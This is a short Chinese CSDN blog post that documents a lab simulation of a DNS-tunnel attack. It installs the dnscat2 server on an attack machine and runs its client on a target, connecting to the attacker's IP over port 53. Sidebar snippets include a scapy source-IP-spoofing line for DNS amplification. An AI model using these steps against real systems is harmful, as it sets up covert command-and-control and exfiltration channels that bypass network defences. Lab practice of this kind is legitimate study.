dns隧道模拟攻击

已于 2024-04-25 19:06:59 修改
阅读量157 收藏
点赞数 2
文章标签: 网络安全 安全威胁分析
于 2024-04-25 19:06:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52961022/article/details/138175999
版权

攻击机下载安装dnscat2

$ sudo git clone https://github.com/iagox86/dnscat2.git

系统上没有安装 Git

修改/etc/yum.repos.d/下以.repo 扩展名结尾的文件将 baseurl 的值修改为其他可用的镜像源地址并修改/etc/resolv.conf的DNS配置

yum install git
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
gem install bundler
sudo yum install ruby-devel
bundle install
su
ruby ./dnscat2.rb --secret=123456

出现这个就是成功

靶机按上述同样下载安装dnscat2,安装完成后

cd dnscat2/client/
make

靶机运行命令:

./dnscat --dns server=【攻击机IP】,port=【攻击机端口默认是53】 --secret=【密码】

靶机显示

攻击机显示

爱喝一点点
关注
一文带你了解10大DNS攻击类型,收藏!
网络技术联盟站
08-16 164
攻击类型攻击机制典型案例防御措施DNS缓存污染攻击注入伪造的DNS响应到缓存服务器,导致用户被重定向到恶意网站。2008年Kaminsky DNS漏洞DNSSEC、提高查询ID随机性、限制缓存TTLDNS劫持篡改DNS解析,将用户流量重定向到攻击者控制的IP地址。2014年土耳其政府劫持Twitter使用可信DNS服务器、加密DNS协议、网络监控TCP SYN洪泛攻击发送大量SYN包,消耗服务器资源,导致无法处理合法连接。2000年Yahoo!遭受SYN洪泛攻击
HCIE安全(4)——模拟DNS缓存毒化攻击
qq_45782298的博客
10-18 944
钓鱼网站本地DOS攻击 一、当我们在浏览器中输入www.baidu.com,敲击回车后,电脑都做了什么? 1、解析输入的URL 2、进行DNS查询 2.1、查询本地浏览器的DNS缓存 chrome://net-internals/#dns 查看谷歌浏览器本地DNS缓存 firefox: about:config 查看火狐浏览器本地DNS缓存 2.2、查看本地hosts文件 C:\Windows\System32\drivers\etc\hosts windows下h
模拟DNS缓存毒药攻击
QA Engineer
05-24 492
第一步:创建DNS服务器。在Windows 2003 Server中,依次单击“开始→管理工具→配置您的服务器向导”,在打开的向导页中依次单击“下一步”按钮。配置向导自动检测所有网络连接的设置情况,若没有发现问题则进入“服务器角色”向导页。 然后在“服务器角色”列表中单击“DNS服务器”选项(图1),并单击“下一步”按钮。打开“选择总结”向导页,如果列表中出现“安装DNS服务器”和“运行配置 D...
scapy模拟攻击_用scapy模拟DNS放大攻击
weixin_39568232的博客
02-22 270
首先,DNS放大攻击,简单解释有两点:1.伪造源IP为其他人的ip地址2.被请求的记录,要求比较大,比如TXT格式,4000KB在A机器上,向DNS发送查询那个TXT的记录,并伪造成别人的ip,即可理解为DNS放大攻击。可以用python的scapy模拟:from scapy import *a = IP(dst=10.32.8.11,src=10.32.132.85) #10.32.13...
网络协议与攻击模拟_14DNS欺骗
fencecat的博客
02-02 1489
DNS欺骗就是利用某种方式将我们访问的域名解析到其他服务器上,从而使得我们无法正常访问到原本我们想要访问的网站。
DNS 截持模拟及环境搭建
weixin_30729609的博客
05-03 233
部署概述 下面是 DNS 截持模拟的网络部署状态图。 这里的 DNS 服务器是配置在主机 172.16.2.51 上的,DNS 服务器上针对 www.baidu.com 的域名进行重定向。另外有两台 Android 机连接到此 DNS 服务器。第一台直接与此 DNS 服务器进行交互,第二台通过第一台共享的热点与 DNS 进行交互。 版权说明 著作权归作者所有...
DNS隧道攻击实验记录
qq_44465615的博客
02-21 1017
到博主做毕设的时间了,因为博主毕设方向的需要的数据集,很少有公开提供(毕竟DNS的记录多多少少带点隐私问题),所以不得不自己模拟DNS攻击来进行操作。 首先要了解啥是DNS隧道攻击的话,可以看一下咱家之前的博文DNS流量分析领域调研。这边就懒得再写一遍了。在之前的搭建子域DNS服务器和Ubuntu搭建DNS服务器中,已经把大致的环境搭建完成了,这里直接开始隧道攻击程序的记录。 攻击方案 这里希望的是能够通过DNS报文来传输文件。 在客户端方面,存在以下几个模块,分别是文件读入模块,编码模块,嵌入模块和发送模
APT34-Glimpse与DNS隧道问题
m0_38103658的博客
09-27 355
APT34-Glimpse与DNS隧道问题 背景: 2019年4月18日,某黑客组织使用Lab Dookhtegan假名,在Telegram频道上出售APT34团队的黑客工具,成员信息,相关基础设施,攻击成果等信息,引发业界威胁情报及Red Team领域的安全人员强烈关注。 其中APT34也被称为OilRig (Crambus,“人面马”组织,Cobalt Gypsy),是一个来自于伊朗的APT...
DNS云学堂 | 入口保卫战,探究DNS隧道“隐秘的角落”
域名国家工程研究中心(ZDNS)的博客
07-13 711
DNS在整个互联网体系中处于入口的重要位置,近年来利用或针对DNS的网络攻击呈愈演愈烈之势,而DNS隧道就是其中典型的攻击形式。DNS隧道指基于DNS封装其他协议(例如SSH、HTTP或自定义私有协议)的方法。利用DNS隧道窃取数据已成为APT攻击的重要组成部分,而DNS服务端口UDP 53通常不会被防火墙管控,这也为攻击者利用DNS进行隐蔽通信提供了便利的条件。 DNS隧道已经存在很长时间,常见的攻击工具包括dns2tcp、dnscat2、Iodine、OzymanDNS、SplitBrain、TCP o
Cobalt Strike渗透测试工具中的DNS隧道原理与实践
它不仅提供了丰富的渗透测试功能,还具有易用性和灵活性,在模拟网络攻击和发现系统漏洞方面表现出色。 ## 1.1 Cobalt Strike的功能与特点 Cobalt Strike集成了多种渗透测试工具和技术,包括端口转发、代理设置、...
DNS域传送漏洞复现(含靶场搭建)
文公子的博客
03-09 5579
DNS域传送漏洞复现(含靶场搭建)一、漏洞原理及危害二、环境搭建三、漏洞复现四、漏洞修复 一、漏洞原理及危害 DNS域传送漏洞是主备服务器间同步数据未进行严格校验导致的,攻击者可以模拟备份服务器向主服务器请求域内资源。 二、环境搭建 下载https://github.com/vulhub/vulhub/tree/master/dns/dns-zone-transfer内的所有文件到linux电脑,切换目录后使用docker-compose up -d进行搭建 注意:部分服务器默认开启服务占用53端口,直接
用scapy模拟DNS放大攻击
weixin_30700099的博客
01-24 451
首先,DNS放大攻击,简单解释有两点: 1.伪造源IP为其他人的ip地址 2.被请求的记录,要求比较大,比如TXT格式,4000KB 在A机器上,向DNS发送查询那个TXT的记录,并伪造成别人的ip,即可理解为DNS放大攻击。 可以用python的scapy模拟: from scapy import * a = IP(dst='10.32.8.11',src='10.3...
模拟解决DOS攻击的shell脚本
weixin_30500473的博客
08-15 280
方法1: #!/bin/sh While true do awk ‘{print $1}’.access.log|grep –v “^$”|sort|uniq –c >/tmp/access.log #netstat –an|grep EST|awk –F ‘[ :]+’ ‘{print $6}’|sort|uniq –c >/tmp/ac...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8509
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
weblogic漏洞——CVE-2020-14882
weixin_57379923的博客
08-13 1315
版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!靶机:IP:192.168.100.40。在 web 服务器中写入 xml 脚本。作 者:PeiyuJue。
卡通风格化魔法术技能粒子特效 :Toon Projectiles 2 1.0
10-19
这款卡通射击特效资源包提供了 15 种独特的射击物、命中效果和闪光效果,风格统一且易于与您的项目集成。它默认支持 Unity 的内置渲染器,并且兼容 HDRP 和 URP 渲染管线。如果您拥有 Hovl Studio 的其他资源,该包将免费提供。所有效果均在各平台兼容,并且可以通过标准尺寸值轻松调整命中效果的大小。需要注意的是,调整射击物大小时,可能需要修改轨迹长度和按距离生成的速率。 该资源还包含了一个演示场景射击脚本,方便用户快速了解如何使用这些特效。该资源包还与 InfinityPBR 的 Projectile Factory 插件兼容,可以进一步增强您的射击游戏效果。 需要注意的是,推广媒体中使用的后处理效果 "Bloom" 并非资源包自带,建议用户在下载资源包之前,先行从 Unity 包管理器下载 "Post Processing Stack"。HDRP 和 URP 渲染管线的用户可以直接利用内置的 "Volume" 组件中的 "Bloom" 效果。
在 MATLAB GUI 中动态更新数据:策略与实践
10-19
通过本文的详细介绍,你应该能够理解如何在 MATLAB GUI 中更新数据。从设计 GUI 界面到处理用户输入,再到动态更新数据,每一步都是构建交互式 MATLAB 应用程序的关键。通过实际的代码示例,你可以更深入地理解这些概念,并将其应用到你自己的项目中。 记住,GUI 的设计和实现是一个迭代的过程。随着你对用户需求的更深入了解,你可能需要不断调整和优化你的 GUI。通过持续的测试和反馈,你可以创建一个既美观又功能强大的 MATLAB GUI 应用程序
【JCR一区级】Matlab实现白鹭群优化算法ESOA-CNN-BiLSTM-Attention的故障诊断算法研究.rar
最新发布
10-20
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
信创实验室建设方案(24页).pptx
10-19
信创实验室建设方案(24页)
HTTP流量与DNS隧道安全检测技术分析
该资源是一份详尽的70多页的PPT,主要探讨了基于HTTP流量和DNS隧道技术的网络安全检测方法,重点关注恶意流量的演变趋势、HTTP可疑流量的检测以及DNS隧道的识别。内容涵盖了僵木蠕虫流量的变化、HTTP流量中的异常...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值